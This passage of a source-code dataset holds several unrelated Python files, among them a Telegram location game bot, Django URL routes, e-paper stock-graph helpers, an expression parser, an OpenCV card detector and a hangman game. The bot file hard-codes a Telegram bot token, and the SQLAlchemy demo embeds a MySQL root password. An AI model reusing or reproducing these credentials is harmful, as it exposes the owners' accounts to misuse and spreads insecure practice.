name=?\", (user[0],))\r\n bot.sendMessage(update.message.chat.id,\r\n '*New objective successfully registered!*',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You\\'re too close to an already existing objective!',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = 'Something went wrong :('\r\n if 10000 > min_dist >= DISCOVER_RADIUS:\r\n d = (\"%.2f\" % min_dist)\r\n message = 'The closest objective is *' + str(d) + '* km away.'\r\n elif min_dist < DISCOVER_RADIUS:\r\n message = 'Captured the objective \\\"' + desc + '\\\" by @' + usr + '!\\n*+25 POINTS!*'\r\n db.execute(\"UPDATE users SET points = ? WHERE name = ?\", (user[1]+25, user[0]))\r\n db.execute(\"UPDATE users SET points = points+5 WHERE name = ?\", (usr,))\r\n db.execute(\"INSERT INTO matches (user, matchid) VALUES (?,?)\",\r\n (user[0], objid))\r\n else:\r\n message = 'No nearby objectives were found. Your own objectives won\\'t show up'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'That\\'s cool! We don\\'t have any use for it though...',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\r\n updater = Updater(token='262103726:AAGOwtH2gGcZTsbi2BL5OpueK5BbKJ0pFIY')\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', start))\r\n dispatcher.add_handler(CommandHandler('help', send_help))\r\n dispatcher.add_handler(CommandHandler('points', get_points))\r\n dispatcher.add_handler(CommandHandler('addobj', add_objective, pass_args=True))\r\n dispatcher.add_handler(CommandHandler('cancel', cancel_objective))\r\n\r\n dispatcher.add_handler(CommandHandler('cheat', cheat))\r\n\r\n dispatcher.add_handler(MessageHandler([], message_handler))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n","sub_path":"Jacobs/JacobsBot.py","file_name":"JacobsBot.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"502579836","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport coreapp.views\nimport coreapp.urls\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ExpensesMonitor.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'coreapp.views.index', name='index'),\n url(r'^login$', 'django.contrib.auth.views.login', name='login'),\n url(r'^register$', 'coreapp.views.register', name='register'),\n url(r'^about$', coreapp.views.about, name='about'),\n url(r'^contact$', coreapp.views.contact, name='contact'),\n url(r'^faq$', coreapp.views.faq, name='faq'),\n\n url(r'^user/', include(coreapp.urls, namespace='user')),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n url(r'^accounts/logout$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n)\n","sub_path":"ExpensesMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"103118076","text":"from PIL import ImageFont\r\nfrom font_fredoka_one import FredokaOne\r\n\r\n\r\ndef draw_text(display, draw, message, font_size=24, y_align=\"middle\"):\r\n \"\"\"Get yfinance ticker object from a symbol\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n message (str): Texr message to display\r\n font_size (int): Font size\r\n y_align (str): Y alignment of message: \"middle\", \"top\" or \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n # Scale down font if the text is bigger than the screen\r\n if w > display.WIDTH:\r\n font_size = int(font_size * display.WIDTH / w)\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n x = (display.WIDTH / 2) - (w / 2)\r\n\r\n if y_align == \"middle\":\r\n y = (display.HEIGHT / 2) - (h / 2)\r\n elif y_align == \"top\":\r\n y = 0\r\n elif y_align == \"bottom\":\r\n y = display.HEIGHT - h\r\n else:\r\n raise Exception(\"y_align parameter not recognised\")\r\n\r\n draw.text((x, y), message, display.BLACK, font)\r\n return draw\r\n\r\n\r\ndef draw_simple_messages(\r\n display,\r\n draw,\r\n messages,\r\n font_sizes={\"top\": 24, \"middle\": 52, \"bottom\": 18},\r\n):\r\n \"\"\"Draw three text messages\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n messages (dict): messages with the keys \"middle\", \"top\" and \"bottom\"\r\n font_sizes (dict): Font sizes dict with the keys \"middle\", \"top\" and \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n for location, message in messages.items():\r\n draw = draw_text(\r\n display,\r\n draw,\r\n message=message,\r\n font_size=font_sizes[location],\r\n y_align=location,\r\n )\r\n return draw\r\n\r\n\r\ndef draw_graph_data(display, draw, data, simple_messages, graph_range):\r\n \"\"\"Draw graph mode data\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n data (DataFrame): DataFrame given by get_data\r\n simple_messages (dict): output of draw_simple_messages()\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n # Display text\r\n message = f\"{simple_messages['top']}: {simple_messages['middle']}\"\r\n font = ImageFont.truetype(FredokaOne, 25)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 0), message, display.BLACK, font)\r\n message = f\"{simple_messages['bottom']}\"\r\n font = ImageFont.truetype(FredokaOne, 15)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 25), message, display.BLACK, font)\r\n\r\n # Display graph\r\n x_margin_right = 50\r\n\r\n y_margin_top = 50\r\n y_margin_bot = 5\r\n y_range = display.HEIGHT - y_margin_top - y_margin_bot\r\n\r\n price_data = list(data[\"close\"])[-graph_range:]\r\n max_price = round(max(price_data), 2)\r\n min_price = round(min(price_data), 2)\r\n\r\n x_list = []\r\n y_list = []\r\n\r\n # y: change scale from [max_price, max_price] to [0, display.HEIGHT]\r\n y_data = [\r\n (display.HEIGHT * (y - min_price)) / (max_price - min_price) for y in price_data\r\n ]\r\n for i in range(graph_range):\r\n x = i * (display.WIDTH - x_margin_right) / graph_range\r\n y = y_data[i]\r\n y = display.HEIGHT - y # 0 on bottom\r\n y = y / display.HEIGHT * y_range + y_margin_top # apply limited range (y_range)\r\n\r\n x_list.append(x)\r\n y_list.append(y)\r\n\r\n draw.line(list(zip(x_list, y_list)), fill=display.BLACK, width=2)\r\n\r\n # Display min price and max price on right side\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, y_margin_top - 3),\r\n str(max_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, display.HEIGHT - 15),\r\n str(min_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n return draw\r\n","sub_path":"ticker/display_utils.py","file_name":"display_utils.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"418843672","text":"# 使用SQLAlchemy \n# ORM, 把关系数据库的表结构映射到对象上\nimport pymysql\n\nfrom sqlalchemy import Column, String, create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nbase = declarative_base()\n\nclass User(base):\n __tablename__ = 'person'\n\n id = Column(String(20),primary_key=True)\n name = Column(String(20))\n\n # 一对多:\n # books = relationship('Book')\n\n# class Book(base):\n# __tablename__ = 'book'\n# id = Column(String(20), primary_key=True)\n# name = Column(String(20))\n# user_id = Column(String(20), ForeignKey('user.id'))\n# 外键\n\nengine = create_engine('mysql+pymysql://root:Zjf9437879228.@localhost:3306/test_py')\n# '数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'\nDBSession = sessionmaker(bind=engine)\n\n# 查询\nsession = DBSession()\nuser = session.query(User).filter(User.id == '3').one()\nprint(user)\nprint('type:',type(user))\nprint('name:',user.name)\n# session.close()\n\n# 插入\nnew_user = User(id='4', name='Bob')\n\nsession.add(new_user)\nsession.commit()\nsession.close()","sub_path":"SQL/SQLAlchemy123.py","file_name":"SQLAlchemy123.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"306874128","text":"from Wpp.expr.Node import Node\nfrom Wpp.expr.operations import binOps, unOps, ternaryPrior, fnArgsPrior, squareBracketPrior\n\ndef scanLexems(lexems, pos, terminators, context):\n\t\"Анализ списка лексем. На выходе единственный узел и позиция последней использованной лекскмы\"\n\tstack = []\n\tstep = 1\n\twhile pos < len(lexems):\n\t\tvalue, lexemType, constType = lexems[pos]\n\t\t# Проверка на команду - завершитель\n\t\tif lexemType == 'cmd' and value in terminators:\n\t\t\tbreak\n\t\tpos += 1\n\t\tif stack and stack[-1].isSpecMinus(lexemType, constType):\n\t\t\t# Специальный случай - замена унарного минуса к числовой константе на отрицательное число \n\t\t\tstack[-1] = Node('arg', lexemType, '-'+value, constType, True)\n\t\telif lexemType == 'const' or lexemType == 'id':\n\t\t\tstack.append(Node('arg', lexemType, value, constType, True))\n\t\telif lexemType == 'cmd':\n\t\t\tif stack and stack[-1].bArgument:\n\t\t\t\tif value == '?':\n\t\t\t\t\tprior = ternaryPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('ternar', lexemType, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\targ2, pos = scanLexems(lexems, pos, {':'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\t\topNode.args.append(arg2)\n\t\t\t\telif value == '(':\n\t\t\t\t\t# Вызов функции\n\t\t\t\t\tprior = fnArgsPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('call', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\tif lexems[pos][0] == ')':\n\t\t\t\t\t\tpos += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\twhile True:\n\t\t\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {',', ')'}, context)\n\t\t\t\t\t\t\ttermCmd, termType, termX = lexems[pos]\n\t\t\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\t\t\tpos += 1\n\t\t\t\t\t\t\tif termCmd == ')':\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\telif value == '[':\n\t\t\t\t\tprior = squareBracketPrior\n\t\t\t\t\t# optimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('index', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {']'}, context)\n\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\tpos += 1\n\t\t\t\telse:\n\t\t\t\t\t# Бинарный оператор\n\t\t\t\t\tprior = binOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid binary operation \"%s\"' % (value))\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('binop', lexemType, value, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\tstack.append(opNode)\n\t\t\telse:\n\t\t\t\t# Унарный оператор\n\t\t\t\tif value == '(':\n\t\t\t\t\t# Скобки для группировки операций\n\t\t\t\t\topNode, pos = scanLexems(lexems, pos, {')'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\telif value == '[':\n\t\t\t\t\t# Значение типа массива\n\t\t\t\t\topNode, pos = createArray(lexems, pos, context)\n\t\t\t\telse:\n\t\t\t\t\tprior = unOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid unary operation ' + value)\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('unop', lexemType, value, prior=prior)\n\t\t\t\tstack.append(opNode)\n\tif pos == len(lexems):\n\t\tcontext.throwError('No end of expression found')\n\toptimizeStack(stack, 100, context)\n\tif len(stack) != 1:\n\t\t# Если узлы не сошлись в один, то это неправильное выражение. Типа x 1\n\t\tcontext.throwError('Invalid expression: [' + ', '.join([str(i) for i in stack])+']')\n\treturn (stack[0], pos)\n\ndef createArray(lexems, pos, context):\n\tvalue = Node('array', 'array', bArgument = True)\n\tdivider = ''\n\twhile divider != ']':\n\t\tnode, pos = scanLexems(lexems, pos, {',', ']'}, context)\n\t\tdivider, t, x = lexems[pos]\n\t\tvalue.args.append(node)\n\t\tpos += 1\n\treturn value, pos\n\ndef optimizeStack(stack, prior, context):\n\tif not stack:\n\t\treturn\n\n\twhile True:\n\t\tlast = stack.pop()\n\t\tif not last.bArgument:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\tif not stack:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top = stack.pop()\n\t\tif op.bArgument:\n\t\t\tcontext.throwError('Expected operation instead of '+str(op))\n\t\tif op.prior > prior:\n\t\t\tstack.append(op)\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top.args.append(last)\n\t\top.bArgument = True\n\t\tstack.append(op)\n","sub_path":"src1/Wpp/expr/scanLexems.py","file_name":"scanLexems.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"173111121","text":"#\n# Based on: https://github.com/EdjeElectronics/OpenCV-Playing-Card-Detector\n#\nimport json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom poke_visor.classes.card_detector.poker_card_info import PokerCardInfo\nfrom poke_visor.classes.card_detector.train_ranks import TrainRanks\nfrom poke_visor.classes.card_detector.train_suits import TrainSuits\n# Adaptive threshold levels\nfrom poke_visor.enums.card_rank_enum import CardRank\nfrom poke_visor.enums.card_suit_enum import CardSuit\n\n# Constants #\n\nBKG_THRESH = 70\nCARD_THRESH = 30\n\n# Width and height of card corner, where rank and suit are\nCORNER_WIDTH = 64\nCORNER_HEIGHT = 160\n\n# Dimensions of rank train images\nRANK_WIDTH = 70\nRANK_HEIGHT = 125\n\n# Dimensions of suit train images\nSUIT_WIDTH = 70\nSUIT_HEIGHT = 100\n\nRANK_DIFF_MAX = 2000\nSUIT_DIFF_MAX = 700\n\nCARD_MAX_AREA = 240000\nCARD_MIN_AREA = 12500\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef _load_settings():\n global CARD_MAX_AREA, CARD_MIN_AREA\n\n if os.path.isfile(\"config.json\"):\n with open(\"config.json\", \"r\") as file:\n config_json = json.loads(file.read())\n if \"card-detector\" in config_json:\n settings = json.loads(file.read())[\"card-detector\"]\n CARD_MAX_AREA = settings[\"card-max-area\"]\n CARD_MIN_AREA = settings[\"card-min-area\"]\n\n\n_load_settings()\n\n\ndef load_ranks(filepath):\n \"\"\"Loads rank images from directory specified by filepath. Stores\n them in a list of Train_ranks objects.\"\"\"\n\n train_ranks = []\n\n for rank in CardRank:\n if rank == CardRank.unknown:\n continue\n\n train_ranks.append(TrainRanks())\n last = len(train_ranks) - 1\n train_ranks[last].rank = rank\n filename = str(rank.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card rank file not found : {filepath + filename}\")\n\n train_ranks[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_ranks\n\n\ndef load_suits(filepath):\n \"\"\"Loads suit images from directory specified by filepath. Stores\n them in a list of Train_suits objects.\"\"\"\n\n train_suits = []\n\n for suit in CardSuit:\n if suit == CardSuit.unknown:\n continue\n\n train_suits.append(TrainSuits())\n last = len(train_suits) - 1\n train_suits[last].suit = suit\n filename = str(suit.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card suit file not found : {filepath + filename}\")\n\n train_suits[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_suits\n\n\ndef preprocess_image(image):\n \"\"\"Returns a grayed, blurred, and adaptively thresholded camera image.\"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (3, 3), 0)\n\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 5, 2)\n return thresh\n\n\ndef find_cards(thresh_image):\n \"\"\"Finds all card-sized contours in a thresholded camera image.\n Returns the number of cards, and a list of card contours sorted\n from largest to smallest.\"\"\"\n\n # Find contours and sort their indices by contour size\n cnts, hier = cv2.findContours(thresh_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n index_sort = sorted(range(len(cnts)), key=lambda i_: cv2.contourArea(cnts[i_]), reverse=True)\n\n # If there are no contours, do nothing\n if len(cnts) == 0:\n return [], []\n\n # Otherwise, initialize empty sorted contour and hierarchy lists\n cnts_sort = []\n hier_sort = []\n cnt_is_card = np.zeros(len(cnts), dtype=int)\n\n # Fill empty lists with sorted contour and sorted hierarchy. Now,\n # the indices of the contour list still correspond with those of\n # the hierarchy list. The hierarchy array can be used to check if\n # the contours have parents or not.\n for i in index_sort:\n cnts_sort.append(cnts[i])\n hier_sort.append(hier[0][i])\n\n # Determine which of the contours are cards by applying the\n # following criteria: 1) Smaller area than the maximum card size,\n # 2), bigger area than the minimum card size, 3) have no parents,\n # and 4) have four corners\n\n for i in range(len(cnts_sort)):\n size = cv2.contourArea(cnts_sort[i])\n peri = cv2.arcLength(cnts_sort[i], True)\n approx = cv2.approxPolyDP(cnts_sort[i], 0.01 * peri, True)\n\n if CARD_MAX_AREA > size > CARD_MIN_AREA and len(approx) == 4:\n cnt_is_card[i] = 1\n\n return cnts_sort, cnt_is_card\n\n\ndef preprocess_card(contour, image) -> PokerCardInfo:\n \"\"\"Uses contour to find information about the poker card. Isolates rank\n and suit images from the card.\"\"\"\n\n # Initialize new card_info object\n card_info = PokerCardInfo()\n\n card_info.contour = contour\n\n # Find perimeter of card and use it to approximate corner points\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.01 * peri, True)\n pts = np.float32(approx)\n\n # Find width and height of card\"s bounding rectangle\n x, y, w, h = cv2.boundingRect(contour)\n card_info.width, card_info.height = w, h\n\n # Find center point of card by taking x and y average of the four corners.\n average = np.sum(pts, axis=0) / len(pts)\n cent_x = int(average[0][0])\n cent_y = int(average[0][1])\n card_info.center = [cent_x, cent_y]\n\n # Warp card into 256x360 flattened image using perspective transform\n # noinspection PyTypeChecker\n warp = cv2.resize(_flattener(image, pts, w, h), (256, 360))\n\n # Grab corner of warped card image and do a 4x zoom\n corner = warp[0:CORNER_HEIGHT, 0:CORNER_WIDTH]\n corner_zoom = cv2.resize(corner, (0, 0), fx=4, fy=4)\n\n # Sample known white pixel intensity to determine good threshold level\n white_level = corner_zoom[corner_zoom.shape[0] - 1, int((CORNER_WIDTH * 4) / 2)]\n thresh_level = white_level - CARD_THRESH\n if thresh_level <= 0:\n thresh_level = 1\n _, poker_thresh = cv2.threshold(corner_zoom, thresh_level, 255, cv2.THRESH_BINARY_INV)\n\n # Split in to top and bottom half (top shows rank, bottom shows suit)\n rank = poker_thresh[0:round(CORNER_HEIGHT * 2), 0:CORNER_WIDTH * 4]\n suit = poker_thresh[round(CORNER_HEIGHT * 2):CORNER_HEIGHT * 4, 0:CORNER_WIDTH * 4]\n\n # Find rank contour and bounding rectangle, isolate and find largest contour\n rank_cnts, hier = cv2.findContours(rank, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rank_cnts = sorted(rank_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker rank\n # image to match dimensions of the train rank image\n if len(rank_cnts) != 0:\n x1, y1, w1, h1 = cv2.boundingRect(rank_cnts[0])\n rank_roi = rank[y1:y1 + h1, x1:x1 + w1]\n rank_sized = cv2.resize(rank_roi, (RANK_WIDTH, RANK_HEIGHT), 0, 0)\n card_info.rank_img = rank_sized\n\n # Find suit contour and bounding rectangle, isolate and find largest contour\n suit_cnts, hier = cv2.findContours(suit, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n suit_cnts = sorted(suit_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker suit\n # image to match dimensions of the train suit image\n if len(suit_cnts) != 0:\n x2, y2, w2, h2 = cv2.boundingRect(suit_cnts[0])\n suit_roi = suit[y2:y2 + h2, x2:x2 + w2]\n suit_sized = cv2.resize(suit_roi, (SUIT_WIDTH, SUIT_HEIGHT), 0, 0)\n card_info.suit_img = suit_sized\n\n return card_info\n\n\ndef match_card(card, train_ranks, train_suits):\n \"\"\"Finds best rank and suit matches for the poker card. Differences\n the poker card rank and suit images with the train rank and suit images.\n The best match is the rank or suit image that has the least difference.\"\"\"\n\n best_rank_match_diff = 10000\n best_suit_match_diff = 10000\n best_rank_match_name = CardRank.unknown\n best_suit_match_name = CardSuit.unknown\n best_rank_name = CardRank.unknown\n best_suit_name = CardSuit.unknown\n\n # If no contours were found in poker card in preprocess_card function,\n # the img size is zero, so skip the differencing process\n # (card will be left as unknown)\n if (len(card.rank_img) != 0) and (len(card.suit_img) != 0):\n\n # Difference the poker card rank image from each of the train rank images,\n # and store the result with the least difference\n for t_rank in train_ranks:\n\n diff_img = cv2.absdiff(card.rank_img, t_rank.img)\n rank_diff = int(np.sum(diff_img) / 255)\n\n if rank_diff < best_rank_match_diff:\n best_rank_match_diff = rank_diff\n best_rank_name = t_rank.rank\n\n # Same process with suit images\n for t_suit in train_suits:\n\n diff_img = cv2.absdiff(card.suit_img, t_suit.img)\n suit_diff = int(np.sum(diff_img) / 255)\n\n if suit_diff < best_suit_match_diff:\n best_suit_match_diff = suit_diff\n best_suit_name = t_suit.suit\n\n # Combine best rank match and best suit match to get poker card\"s identity.\n # If the best matches have too high of a difference value, card identity\n # is still unknown\n if best_rank_match_diff < RANK_DIFF_MAX:\n best_rank_match_name = best_rank_name\n\n if best_suit_match_diff < SUIT_DIFF_MAX:\n best_suit_match_name = best_suit_name\n\n # Return the identity of the card and the quality of the suit and rank match\n return best_rank_match_name, best_suit_match_name, best_rank_match_diff, best_suit_match_diff\n\n\ndef draw_results(image, card):\n \"\"\"Draw the card name and contour on the camera image.\"\"\"\n\n x = card.center[0]\n y = card.center[1]\n\n rank_name = card.best_rank_match\n suit_name = card.best_suit_match\n\n # Draw card name twice, so letters have black outline\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n return image\n\n\ndef _flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\n See www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is \"diamond\" oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if 0.8 * h < w < 1.2 * h: # If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n max_width = 200\n max_height = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [max_width - 1, 0], [max_width - 1, max_height - 1], [0, max_height - 1]], np.float32)\n m = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, m, (max_width, max_height))\n warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n\n return warp\n","sub_path":"application/poke_visor/logic/card_detector/card_detection_functions.py","file_name":"card_detection_functions.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"66896693","text":"import random\nimport sys\nimport os\n\nclass HangMan:\n\n def __init__(self):\n self.capitals = []\n self.cap_name_output = []\n self.not_in_word = []\n self.cap_name = []\n self.choice = ' '\n self.type_letter = ' '\n self.type_word = ' '\n\n\n # importing capital cities from file, storing them in list,\n # choosing one of them radomly\n def make_capitals(self):\n with open(\"capitals.txt\", \"r\") as capital:\n for item in capital:\n self.capitals.append(item.replace('\\n', ''))\n capital.close()\n self.cap_name = list(random.choice(self.capitals))\n\n\n # filling another list with dashes and * if there is a space\n def make_dashes(self):\n for letter in self.cap_name:\n for n, i in enumerate(self.cap_name):\n if i == ' ':\n self.cap_name[n] = '*'\n if letter == '*':\n self.cap_name_output.append('*')\n else:\n self.cap_name_output.append('_ ')\n\n\n # chcecking player's lifes, close program when lifes reache\n def end_game(self,lifes):\n if lifes == 0:\n print('\\033[91m' + 'GAME OVER!' + '\\033[0m')\n sys.exit()\n\n\n #checking user input if it is letter or space\n def check_letter(self):\n while not len(self.type_letter) == 1:\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n while not self.type_letter.isalpha():\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n\n\n def letter(self,lifes):\n if self.not_in_word != []:\n print(\"Used letters: \" + ', '.join(self.not_in_word))\n if '_ ' in self.cap_name_output:\n self.type_letter = input('Type letter: ').upper()\n self.check_letter()\n if self.type_letter not in self.cap_name:\n self.not_in_word.append(self.type_letter)\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.game(lifes - 1)\n for letter, i in enumerate(self.cap_name):\n if i == self.type_letter:\n self.cap_name_output[letter] = self.type_letter\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if '_ ' not in self.cap_name_output:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n self.game(lifes)\n\n\n # checking if in entered word(s) is space and changing spaces for *\n # comparing typed word with capital name\n def word(self,lifes):\n self.type_word = list(input('Type word: ').upper())\n if ' ' in self.type_word:\n for n, i in enumerate(self.type_word):\n if i == ' ':\n self.type_word[n] = '*'\n if self.type_word == self.cap_name:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n else:\n self.game(lifes - 1)\n\n\n # asking user for input, runs appropriate function depending on input\n def game(self,lifes):\n print('\\nYou have', lifes, ' lifes.')\n self.end_game(lifes)\n self.choice = input('Would You like to guess a letter or whole word(s)? ').lower()\n if self.choice == 'letter' or self.choice == 'l':\n self.letter(lifes)\n elif self.choice == 'word' or self.choice == 'w':\n print('\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.word(lifes)\n else:\n print('You can chose only between letter or word, type again!')\n self.game(lifes)\n\n\n # user can set difficulty level, to determine number of lifes\n def levels(self):\n input_level = input('Do you chose EASY, MEDIUM or HARD level? ').lower()\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if input_level == 'easy' or input_level == 'e':\n self.game(15)\n elif input_level == 'medium' or input_level == 'm':\n self.game(10)\n elif input_level == 'hard' or input_level == 'h':\n 